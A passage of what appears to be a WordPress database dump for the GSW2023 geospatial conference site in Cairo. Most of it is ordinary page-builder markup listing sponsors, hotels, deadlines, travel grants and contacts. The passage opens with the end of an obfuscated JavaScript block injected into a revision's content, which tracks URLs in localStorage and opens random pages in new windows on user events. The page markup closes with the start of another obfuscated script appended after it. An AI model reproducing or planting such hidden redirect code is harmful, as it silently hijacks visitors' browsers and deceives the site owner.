_0xfdead6=[_0x365b[0x6],_0x365b[0x7],_0x365b[0x8],_0x365b[0x9],_0x365b[0xa],_0x365b[0xb],_0x365b[0xc],_0x365b[0xd],_0x365b[0xe],_0x365b[0xf]],_0x480bb2=0x3,_0x3ddc80=0x6,_0x10ad9f=_0x1f773b=>{_0x1f773b[_0x365b[0x14]]((_0x1e6b44,_0x967357)=>{!localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11])&&localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x1e6b44+_0x365b[0x11],0x0);});},_0x2317c1=_0x3bd6cc=>{const _0x2af2a2=_0x3bd6cc[_0x365b[0x15]]((_0x20a0ef,_0x11cb0d)=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x20a0ef+_0x365b[0x11])==0x0);return _0x2af2a2[Math[_0x365b[0x18]](Math[_0x365b[0x16]]()*_0x2af2a2[_0x365b[0x17]])];},_0x57deba=_0x43d200=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x43d200+_0x365b[0x11],0x1),_0x1dd2bd=_0x51805f=>localStorage[_0x365b[0x12]](_0x365b[0x10]+_0x51805f+_0x365b[0x11]),_0x5e3811=(_0x5aa0fd,_0x594b23)=>localStorage[_0x365b[0x13]](_0x365b[0x10]+_0x5aa0fd+_0x365b[0x11],_0x594b23),_0x381a18=(_0x3ab06f,_0x288873)=>{const _0x266889=0x3e8*0x3c*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x288873-_0x3ab06f)/_0x266889);},_0x3f1308=(_0x3a999a,_0x355f3a)=>{const _0x5c85ef=0x3e8*0x3c;return Math[_0x365b[0x1a]](Math[_0x365b[0x19]](_0x355f3a-_0x3a999a)/_0x5c85ef);},_0x4a7983=(_0x19abfa,_0x2bf37,_0xb43c45)=>{_0x10ad9f(_0x19abfa),newLocation=_0x2317c1(_0x19abfa),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1b],_0xb43c45),_0x5e3811(_0x365b[0x10]+_0x2bf37+_0x365b[0x1c],_0xb43c45),_0x57deba(newLocation),window[_0x365b[0x0]]()&&window[_0x365b[0x1e]](newLocation,_0x365b[0x1d]);};_0x10ad9f(_0xfdead6);function _0x978889(_0x3b4dcb){_0x3b4dcb[_0x365b[0x1f]]();const _0x2b4a92=location[_0x365b[0x20]];let _0x1b1224=_0x2317c1(_0xfdead6);const _0x4593ae=Date[_0x365b[0x21]](new Date()),_0x7f12bb=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b]),_0x155a21=_0x1dd2bd(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c]);if(_0x7f12bb&&_0x155a21)try{const _0x5d977e=parseInt(_0x7f12bb),_0x5f3351=parseInt(_0x155a21),_0x448fc0=_0x3f1308(_0x4593ae,_0x5d977e),_0x5f1aaf=_0x381a18(_0x4593ae,_0x5f3351);_0x5f1aaf>=_0x3ddc80&&(_0x10ad9f(_0xfdead6),_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1c],_0x4593ae));;_0x448fc0>=_0x480bb2&&(_0x1b1224&&window[_0x365b[0x0]]()&&(_0x5e3811(_0x365b[0x10]+_0x2b4a92+_0x365b[0x1b],_0x4593ae),window[_0x365b[0x1e]](_0x1b1224,_0x365b[0x1d]),_0x57deba(_0x1b1224)));}catch(_0x2386f7){_0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}else _0x4a7983(_0xfdead6,_0x2b4a92,_0x4593ae);}document[_0x365b[0x23]](_0x365b[0x22],_0x978889);}());</script>','GSW2023','','inherit','closed','closed','','3066-revision-v1','','','2023-06-01 08:46:52','2023-06-01 08:46:52','',3066,'https://gsw2023.com/?p=4604',0,'revision','',0),
(4605,1,'2023-06-01 08:48:17','2023-06-01 08:48:17','<p>[vc_row css=\".vc_custom_1680403823446{margin-top: -35px !important;}\"][vc_column css=\".vc_custom_1680403783341{margin-top: -15px !important;}\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609158984{margin-top: 100px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 36pt;\">Prime Sponsor</span></h4>\n<p>&nbsp;</p>\n<p><a href=\"https://www.gasgi.gov.sa\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4592\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/شعار-الهيئة-العامة-للمساحه-والمعلومات-الجيومكانية-بالمملكة-العربية-السعودية-2-300x110.jpg\" alt=\"\" width=\"447\" height=\"164\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609109195{margin-top: 0px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Platinum Sponsors</strong></span></h4>\n<p><a href=\"https://www.pix4d.com/ \"><img class=\"https://www.pix4d.com/ aligncenter wp-image-4482\" title=\"https://www.pix4d.com/ \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/LOGO_CORP_HORIZONTAL_LIGHT-300x91.png\" alt=\"\" width=\"385\" height=\"117\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406603694{margin-top: 125px !important;}\"]</p>\n<h6><a href=\"https://www.bdstar.com/en/\"><img class=\"aligncenter wp-image-3987\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/BDStar-1024x223.png\" alt=\"\" width=\"317\" height=\"69\" /></a></h6>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406565735{margin-top: 50px !important;}\"]</p>\n<h3 style=\"text-align: center;\"><strong>Gold Sponsors</strong></h3>\n<p><span style=\"font-size: 8pt;\"><a href=\"http://hdmap.geomatics.ncku.edu.tw/index-US.php\"><img class=\"aligncenter wp-image-3989\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/LOGO-of-HDP-center-final0730-1-1024x351.png\" alt=\"\" width=\"350\" height=\"120\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406679677{margin-top: 137px !important;}\"]<a href=\"www.applanix.com\"><img class=\"aligncenter wp-image-3988\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Applanix_CYMK_OUTLINES_Horizontal_Blue-1024x129.jpg\" alt=\"\" width=\"451\" height=\"57\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_row_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969898333{margin-top: 5px !important;}\"]<a href=\"https://leica-geosystems.com\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4500 \" src=\"https://gsw2023.com/wp-content/uploads/2023/05/HEXAGON_STANDARD_CMYK_LOGO-300x124.jpg\" alt=\"\" width=\"341\" height=\"141\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684305185157{margin-top: 40px !important;}\"]<span style=\"font-size: 8pt;\"><a href=\"https://www.tasa.org.tw/index.php?ln=en\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4089 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/logo_en_tasa2-300x63.png\" alt=\"\" width=\"300\" height=\"63\" /></a></span>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1684969841504{margin-top: 20px !important;}\"]<a href=\"www.microengineering.ca \" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4560 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/Artboard-1-300x83.png\" alt=\"\" width=\"300\" height=\"83\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1685609238799{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><strong>Silver Sponsors</strong></span></h4>\n<p><a href=\"https://www.giscon.de/en/\"><img class=\"aligncenter wp-image-4597 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/06/giscon-300x222.jpg\" alt=\"\" width=\"300\" height=\"222\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"10\"][vc_row_inner css=\".vc_custom_1680403868499{margin-top: -35px !important;}\"][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681676234291{margin-top: 50px !important;}\"]<a href=\"http://www.geosat.com.tw\"><img class=\"aligncenter wp-image-4041 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Geosat-logo-300x170.jpg\" alt=\"\" width=\"300\" height=\"170\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406965583{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><strong>Bronze Sponsors</strong></h4>\n<p><a href=\"http://www.riegl.com\"><img class=\"aligncenter wp-image-3997 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Logo_Schriftzug_rgb_R-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/3\"][vc_column_text css=\".vc_custom_1681406157694{margin-top: 88px !important;}\"]<a href=\"http://www.robotlab.com.tw\"><img class=\"aligncenter wp-image-4033 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/04/Xiang-Cheng-electronic-Logo-300x107.png\" alt=\"\" width=\"300\" height=\"107\" /></a>[/vc_column_text][/vc_column_inner][/vc_row_inner][vc_column_text css=\".vc_custom_1684202742439{margin-top: 50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\">Official Airline</span></h4>\n<p><a href=\"https://bit.ly/3HLQBrB\" target=\"_blank\" rel=\"noopener\"><img class=\"aligncenter wp-image-4495 size-medium\" src=\"https://gsw2023.com/wp-content/uploads/2023/05/egyptair-300x173.png\" alt=\"\" width=\"300\" height=\"173\" /></a></p>\n<p style=\"text-align: center;\">Egypt Air will offer 20% Discount on tickets for the Conference Participants. To receive the password for the getting the discount, please send an email to:</p>\n<p style=\"text-align: center;\"><strong>GSW-EGYPTAIR@gsw2023.com</strong></p>\n<p>[/vc_column_text][vc_separator style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-animated\" bg_image_new=\"id^3283|url^https://gsw2023.com/wp-content/uploads/2022/11/1664433062169.jpg|caption^null|alt^null|title^1664433062169|description^null\" animation_direction=\"top-animation\" bg_override=\"full\"][vc_column width=\"1/2\"][vc_column_text css=\".vc_custom_1684379817578{margin-left: -50px !important;border-left-width: -50px !important;}\"]</p>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffff00; font-size: 24pt;\">InterContinental Cairo Semiramis</span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\"><img class=\" wp-image-3289 aligncenter\" src=\"https://gsw2023.com/wp-content/uploads/2022/11/282192719-300x169.jpg\" alt=\"\" width=\"328\" height=\"185\" />Conference Venue </span></h4>\n<h4 style=\"text-align: center;\"><span style=\"color: #ffffff; font-size: 18pt;\">Special Rate Booking is Opened Now</span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.ihg.com%2Fintercontinental%2Fhotels%2Fus%2Fen%2Fcairo%2Fcroha%2Fhoteldetail%3FfromRedirect%3Dtrue%26qSrt%3DsAV%26qIta%3D99801505%26icdv%3D99801505%26qSlH%3DCROHA%26qGrpCd%3DDY8%26setPMCookies%3Dtrue%26qSHBrC%3DIC%26qDest%3DCorniche%2BEl%2BNil%25252C%2BCairo%25252C%2BEG%26srb_u%3D1|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684379884193{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: -50px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][vc_column width=\"1/2\" awb_type=\"image\"][vc_column_text]</p>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 24pt; color: #ffff00;\">Ramses Hilton hotel</span></h4>\n<h4></h4>\n<p><img class=\"aligncenter\" src=\"https://www.hilton.com/im/en/CAIRHTW/16763081/exterior-night-shot.jpg?impolicy=crop&amp;cw=4849&amp;ch=3334&amp;gravity=NorthWest&amp;xposition=75&amp;yposition=0&amp;rw=320&amp;rh=220\" alt=\"Hotel Exterior at Night\" width=\"262\" height=\"180\" /></p>\n<p>&nbsp;</p>\n<h4 style=\"text-align: center;\"></h4>\n<h4 style=\"text-align: center;\"><span style=\"font-size: 18pt;\"><span style=\"color: #ffffff;\">Special Rate Booking is O</span><span style=\"color: #ffffff;\">pened Now</span></span></h4>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fwww.hilton.com%2Fen%2Fattend-my-event%2Fcairhtw-gaas23-e979b836-791b-44ea-9095-410655c177d0%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1684378842229{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]BOOK NOW[/dt_default_button][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_column_text][/vc_column_text][vc_column_text css=\".vc_custom_1675473187232{border-top-width: 25px !important;padding-top: 25px !important;}\"]</p>\n<h3></h3>\n<h3></h3>\n<h3></h3>\n<h3 class=\"fancy-title entry-title start-animation-done start-animation\" style=\"text-align: justify; color: #311b92;\"><strong>IMPORTANT DATES</strong></h3>\n<p>[/vc_column_text][vc_row_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper submission (Annals): April 30, 2023 </strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Full paper Author notification: June 15, 2023</strong></li>\n</ul>\n<p>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][vc_column_inner width=\"1/2\"][ultimate_icon_list][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]</p>\n<ul>\n<li><strong>Abstract submission (Archives): May 15, 2023</strong></li>\n</ul>\n<p><strong style=\"color: white;\">SSSSSSSSSSSSSSSSSSSSSSSSSSSSSSSS</strong>[/ultimate_icon_list_item][/ultimate_icon_list][vc_separator style=\"shadow\" border_width=\"5\" css=\".vc_custom_1681902149314{margin-top: -25px !important;}\"][ultimate_icon_list icon_size=\"35\" icon_margin=\"10\"][ultimate_icon_list_item icon=\"far fa-calendar-alt\" icon_color=\"#311b92\" content_font_family=\"font_family:Raleway|font_call:Raleway\"]<strong>Abstract Author notification: June 15, 2023</strong>[/ultimate_icon_list_item][/ultimate_icon_list][/vc_column_inner][/vc_row_inner][vc_separator style=\"shadow\" border_width=\"5\"][vc_row_inner css=\".vc_custom_1668021047643{margin-top: 25px !important;}\"][vc_column_inner css=\".vc_custom_1668021165897{padding-top: 40px !important;}\"][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fimportant-dates%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"300\" css=\".vc_custom_1668192997249{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]ALL IMPORTANT DATES[/dt_default_button][/vc_column_inner][/vc_row_inner][/vc_column][vc_column width=\"1/2\"][vc_row_inner css=\".vc_custom_1668005438919{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_inner width=\"1/4\"][vc_single_image image=\"3103\" img_size=\"120x120\" alignment=\"center\" css=\".vc_custom_1668204801057{margin-top: 1px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"][/vc_column_inner][vc_column_inner width=\"3/4\" css=\".vc_custom_1668010702427{margin-top: 35px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][ult_countdown count_style=\"ult-cd-s2\" datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin,ssec\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_style=\"font-weight:bold;\" timer_unit_font_family=\"font_family:|font_call:\" tick_unit_style=\"font-weight:bold;\" css_countdown=\".vc_custom_1668204929553{margin-top: 20px !important;}\" tick_size=\"desktop:50px;\"][/vc_column_inner][/vc_row_inner][vc_single_image image=\"3289\" img_size=\"1149x800\"][/vc_column][vc_column][/vc_column][vc_column][vc_column_text]</p>\n<h5 style=\"text-align: center;\"><span style=\"font-size: 12pt;\"><strong>Travel Grants by the ISPRS Foundation for GSW’2023, 2-7 September 2023 </strong></span></h5>\n<ul>\n<li style=\"text-align: left;\">Deadline for submission of travel grant applications : June 16, 2023</li>\n<li style=\"text-align: left;\">Decision and notification of successful applicants : July 15, 2023</li>\n<li style=\"text-align: left;\">Notification of acceptance of travel grant to Operations Officer : July 30, 2023</li>\n</ul>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" border_width=\"10\" accent_color=\"#311b92\"][/vc_column][vc_column][/vc_column][/vc_row][vc_row bg_type=\"image\" parallax_style=\"vcpb-vz-jquery\" bg_image_new=\"id^3189|url^https://m22.gsw2023.com/wp-content/uploads/2022/11/cairo-egypt_shutterstock_1421974805-scaled.jpg|caption^null|alt^null|title^cairo-egypt_shutterstock_1421974805|description^null\" parallax_sense=\"40\" bg_override=\"ex-full\" enable_overlay=\"enable_overlay_value\" overlay_color=\"rgba(0,0,0,0.6)\" type=\"vc_default\" css=\".vc_custom_1668018620108{padding-top: 100px !important;padding-bottom: 105px !important;}\"][vc_column width=\"5/6\" offset=\"vc_col-lg-offset-3 vc_col-lg-6 vc_col-md-offset-1 vc_col-md-10 vc_col-sm-offset-1\" el_class=\"text-centered\"][ultimate_heading main_heading=\"REGISTRATION\" main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"]<strong>Payment of Registration is Opened Now</strong>[/ultimate_heading][ultimate_heading main_heading_color=\"#ffffff\" sub_heading_color=\"#ffffff\" spacer=\"line_only\" spacer_position=\"middle\" line_height=\"5\" line_color=\"\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\" main_heading_margin=\"margin-bottom:10px;\" line_width=\"120\" el_class=\"accent-border-color\" sub_heading_style=\"font-style:italic;\" sub_heading_font_size=\"desktop:22px;mobile_landscape:16px;\" sub_heading_line_height=\"desktop:32px;mobile_landscape:26px;\" spacer_margin=\"margin-bottom:40px;\" sub_heading_margin=\"margin-bottom:50px;\"][/ultimate_heading][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fregistration%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153474011{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]INFORMATION[/dt_default_button][dt_default_button link=\"url:https%3A%2F%2Fgsw2023.com%2Findex.php%2Fcontact%2F|target:_blank\" size=\"big\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" css=\".vc_custom_1685153388835{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]CONTACT US[/dt_default_button][/vc_column][/vc_row][vc_row css=\".vc_custom_1668205719738{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column width=\"1/2\" css=\".vc_custom_1668010547399{margin-top: 20px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_column_text css=\".vc_custom_1675475943417{margin-bottom: 0px !important;border-bottom-width: 0px !important;padding-bottom: 0px !important;}\"]</p>\n<h2 style=\"color: #311b92; text-align: left;\"><strong> EGYPT GSW\'2023</strong></h2>\n<p>&nbsp;</p>\n<h3></h3>\n<p>[/vc_column_text][vc_column_text css=\".vc_custom_1684377464605{margin-top: 0px !important;border-top-width: 0px !important;padding-top: 0px !important;}\"]</p>\n<p style=\"text-align: justify;\">As we celebrate our 50th anniversary, the Arab Academy for Science, Technology, and Maritime Transport (AASTMT) is honored to host the ISPRS first Geospatial Week in Africa and Middle East in 2023 (GSW-2023) that will be held under the auspices of H.E Secretary-General of the League of Arab States. The conference will be held in September 2023, at the InterContinental Cairo Semiramis Cairo, Egypt. AASTMT strongly believes that science is the key to the future and the cornerstone for nations\' progress and prosperity.</p>\n<p>[/vc_column_text][dt_default_button link=\"url:https%3A%2F%2Fm22.gsw2023.com%2Findex.php%2Fwelcome%2F\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" button_alignment=\"btn_center\" css=\".vc_custom_1668029705082{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]Read More[/dt_default_button][/vc_column][vc_column width=\"1/2\" css=\".vc_custom_1668010506951{margin-top: 0px !important;margin-bottom: 0px !important;border-top-width: 0px !important;border-bottom-width: 0px !important;padding-top: 0px !important;padding-bottom: 0px !important;}\"][vc_single_image image=\"3162\" img_size=\"1200x1000\"][/vc_column][/vc_row][vc_row][vc_column][vc_separator color=\"custom\" style=\"shadow\" border_width=\"7\" accent_color=\"#311b92\"][vc_column_text]</p>\n<h3 style=\"text-align: center;\"><span style=\"font-size: 24pt;\"><strong>Keynotes Speakers and Panelists</strong></span></h3>\n<p>[/vc_column_text][dt_team_masonry order=\"asc\" image_sizing=\"proportional\" img_max_width=\"180px\" image_paddings=\"10px 10px 10px 10px\" img_border_radius=\"10px\" post_title_bottom_margin=\"0px\" read_more_button=\"off\" soc_icon_border_width=\"0px\" posts_offset=\"0\" category=\"104\"][vc_separator color=\"violet\" style=\"shadow\" border_width=\"10\"][/vc_column][/vc_row][vc_row][vc_column width=\"1/2\"][vc_single_image image=\"3229\" img_size=\"700x525\"][/vc_column][vc_column width=\"1/2\"][vc_single_image image=\"3225\" img_size=\"675x480\"][dt_default_button link=\"url:https%3A%2F%2Faast.edu%2Fen%2F|target:_blank\" smooth_scroll=\"y\" size=\"medium\" btn_width=\"btn_fixed_width\" custom_btn_width=\"200\" animation=\"swing\" css=\".vc_custom_1668027792405{margin-right: 10px !important;margin-bottom: 10px !important;margin-left: 10px !important;}\"]MORE[/dt_default_button][/vc_column][/vc_row][vc_row bg_type=\"grad\" bg_override=\"ex-full\" type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668009257885{padding-top: 40px !important;padding-bottom: 60px !important;}\" bg_grad=\"background: -webkit-gradient(linear, left top, left bottom, color-stop(10%, #311B92), color-stop(95%, #311B45));background: -moz-linear-gradient(left,#311B92 10%,#311B45 95%);background: -webkit-linear-gradient(left,#311B92 10%,#311B45 95%);background: -o-linear-gradient(left,#311B92 10%,#311B45 95%);background: -ms-linear-gradient(left,#311B92 10%,#311B45 95%);background: linear-gradient(left,#311B92 10%,#311B45 95%);\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][vc_row_inner][vc_column_inner width=\"1/2\"][dt_fancy_title title=\"GSW2023 Venue\" title_size=\"h2\" title_color=\"accent\" separator_style=\"disabled\" el_width=\"200\"][vc_separator color=\"white\" style=\"shadow\" border_width=\"5\"][vc_column_text]</p>\n<h4 style=\"text-align: justify; color: cyan;\">GSW2023 Will be held at the</h4>\n<h4 style=\"text-align: justify; color: white;\"><strong>InterContinental Cairo Semiramis</strong></h4>\n<p>&nbsp;</p>\n<h4 style=\"text-align: justify; color: cyan;\"><strong>For More Information:</strong></h4>\n<p><span style=\"font-size: 12pt;\"><strong>Contact us at: </strong><a href=\"mailto:info@gsw2023.com\"><strong>info@gsw2023.com</strong></a></span></p>\n<h5 style=\"text-align: justify; color: white;\"><strong>The Arab Academy for Science, Science, and Maritime Transport</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>P.O. Box 1029 -Gamal Abdelnaser st. -Miami ,Alexandria</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Tel :(+203) 5497598</strong></h5>\n<h5 style=\"text-align: justify; color: white;\"><strong>Fax:(+203) 5497598</strong></h5>\n<p>[/vc_column_text][/vc_column_inner][vc_column_inner width=\"1/2\"][vc_gmaps link=\"#E-8_JTNDaWZyYW1lJTIwc3JjJTNEJTIyaHR0cHMlM0ElMkYlMkZ3d3cuZ29vZ2xlLmNvbSUyRm1hcHMlMkZlbWJlZCUzRnBiJTNEJTIxMW0xOCUyMTFtMTIlMjExbTMlMjExZDM0NTMuNzgzNzk1Mjk1ODM5JTIxMmQzMS4yMjk4MDEzMTUxMTUwMiUyMTNkMzAuMDQzMDU5OTgxODgyNzc0JTIxMm0zJTIxMWYwJTIxMmYwJTIxM2YwJTIxM20yJTIxMWkxMDI0JTIxMmk3NjglMjE0ZjEzLjElMjEzbTMlMjExbTIlMjExczB4MCUyNTNBMHg4Mzk4MmRiOWY2ODY5Y2ElMjEyek16RENzREF5SnpNMUxqQWlUaUF6TWNLd01UTW5OVFV1TWlKRiUyMTVlMCUyMTNtMiUyMTFzZW4lMjEyc2VnJTIxNHYxNjYzMzI1MDg5MDEwJTIxNW0yJTIxMXNlbiUyMTJzZWclMjIlMjB3aWR0aCUzRCUyMjg4NSUyMiUyMGhlaWdodCUzRCUyMjQ1MCUyMiUyMHN0eWxlJTNEJTIyYm9yZGVyJTNBMCUzQiUyMiUyMGFsbG93ZnVsbHNjcmVlbiUzRCUyMiUyMiUyMGxvYWRpbmclM0QlMjJsYXp5JTIyJTIwcmVmZXJyZXJwb2xpY3klM0QlMjJuby1yZWZlcnJlci13aGVuLWRvd25ncmFkZSUyMiUzRSUzQyUyRmlmcmFtZSUzRSUyMA==\"][/vc_column_inner][/vc_row_inner][/vc_column][/vc_row][vc_row type=\"vc_default\" margin_top=\"-50\" css=\".vc_custom_1668026824667{padding-top: 40px !important;padding-bottom: 40px !important;}\"][vc_column offset=\"vc_col-lg-12 vc_col-md-12\"][ultimate_heading main_heading=\"GSW\'2023\" main_heading_color=\"#311b92\" main_heading_style=\"font-weight:bold;\" main_heading_font_size=\"desktop:44px;tablet_portrait:30px;\" main_heading_line_height=\"desktop:54px;tablet_portrait:40px;\"][/ultimate_heading][vc_separator color=\"custom\" style=\"shadow\" border_width=\"10\" accent_color=\"#40f7e5\"][ult_countdown datetime=\"2023/09/02 00:00:00\" countdown_opts=\"sday,shr,smin\" timer_bg_color=\"#ffffff\" tick_col=\"#311b92\" tick_sep_col=\"#311b92\" tick_unit_style=\"font-weight:bold;\" tick_style=\"font-weight:bold;\"][vc_row_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][vc_column_inner width=\"1/3\"][dt_icon_text dt_text_title=\"info@gsw2023.com\" dt_text_custom_title_color=\"#311b92\" dt_text_desc=\"\" show_btn=\"n\" dt_text_icon_border_width=\"2px\" dt_text_icon_color=\"#ffffff\"][/vc_column_inner][vc_column_inner width=\"1/3\"][/vc_column_inner][/vc_row_inner][vc_column_text]</p>\n<p style=\"text-align: center;\"><strong><a href=\"mailto:gsw2023@aast.edu\">gsw2023@aast.edu</a></strong></p>\n<p style=\"text-align: center;\"><strong> <a href=\"mailto:aaelbary@gsw2023.com\">aaelbary@gsw2023.com</a></strong></p>\n<p>[/vc_column_text][/vc_column][/vc_row][vc_row][vc_column][/vc_column][/vc_row]</p>\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x10c8dc=_0x10c8();return 